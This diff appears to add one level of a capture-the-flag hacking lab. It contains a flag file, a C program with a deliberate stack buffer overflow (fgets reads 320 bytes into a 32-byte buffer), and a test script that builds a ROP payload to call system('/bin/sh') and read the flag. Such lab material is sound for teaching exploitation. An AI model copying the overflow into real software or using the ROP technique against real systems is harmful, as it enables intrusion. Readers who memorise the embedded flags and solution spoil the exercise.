5

4/level5/flag.txt

@@ -0,0 +1 @@
+hacklab{thanks_mario_but_the_flag_is_on_another_server}

4/level5/level5.c

@@ -0,0 +1,17 @@
+// gcc -o level5 -no-pie -fno-stack-protector level5.c
+#include <stdio.h>
+#include <stdlib.h>
+
+char command[] = "/bin/sh";
+
+int main(int argc, char **argv) {
+  // Disable output buffering. Not part of the challenge.
+  setvbuf(stdout, NULL, _IONBF, 0);
+  setvbuf(stdin, NULL, _IONBF, 0);
+
+  char buffer[32];
+  puts("What do you want to talk about?");
+  fgets(buffer, 320, stdin);
+  system("echo Bye.");
+  return 0;
+}

4/level5/test.sh

@@ -0,0 +1,15 @@
+#ROP
+#0x0000000000401283 : pop rdi ; ret
+
+#objdump
+#0000000000404048 g     O .data	0000000000000008              command
+
+OLDFLAG="hacklab{SSE_1n5truct10n5_n33d_spec14l_al1gnm3nt_UwT8mByQ}\n"
+PADDING="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa" #32
+SAVERBP="\x90\xde\xff\xff\xff\x7f\x00\00"  #kind of irrelevant
+GADGET1="\x84\x12\x40\00\00\00\00\00"      #ret (for stack alignment)
+GADGET2="\x83\x12\x40\00\00\00\00\00"      #pop rdi, ret
+CMDADDR="\x48\x40\x40\00\00\00\00\00"
+CMDCALL="\x10\x12\x40\00\00\00\00\00"
+
+printf "$OLDFLAG$PADDING$SAVERBP$GADGET2$CMDADDR$CMDCALL\ncat flag.txt\n"